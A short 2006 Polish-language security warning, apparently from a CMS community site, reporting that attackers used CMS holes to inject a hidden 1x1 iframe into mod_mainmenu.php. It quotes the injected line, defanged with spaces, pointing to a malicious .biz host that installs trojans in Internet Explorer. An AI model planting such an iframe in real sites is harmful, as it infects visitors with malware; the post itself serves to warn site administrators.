|
Napisał Dylek
|
|
05 Sie 2006, 09:14 |
Jak raportuje nam Artur Dudek, trafił na przypadki podrzucania przez luki w CMSie konia trojańskiego, który później poprzez przeglądarkę zaraża komputery odwiedzających serwis.
Poniższy kod dodano do mod_mainmenu.php na początku pliku (użyto
prostego kodowania adresu za pomocą znaków ascii):
< iframe src = " http : // zchxsikpgz . biz / dl / adv521 . php " height = " 1 "
width = " 1 " > < / iframe >
(spacje powstawiane umyślnie)
Efekt działania: instaluje się ibm0001.exe i kupa trojanów po otwarciu strony w IE, a w
Firefoxie widać tylko kwadraty przy modułach menu o wielkości 1px x 1px
z obramowaniem.
U Artura ten przypadek dotyczyl wpisu w mod_mainmenu.php
|
|
Last Updated ( 05 Sie 2006, 09:31 )
|
Archiwum 
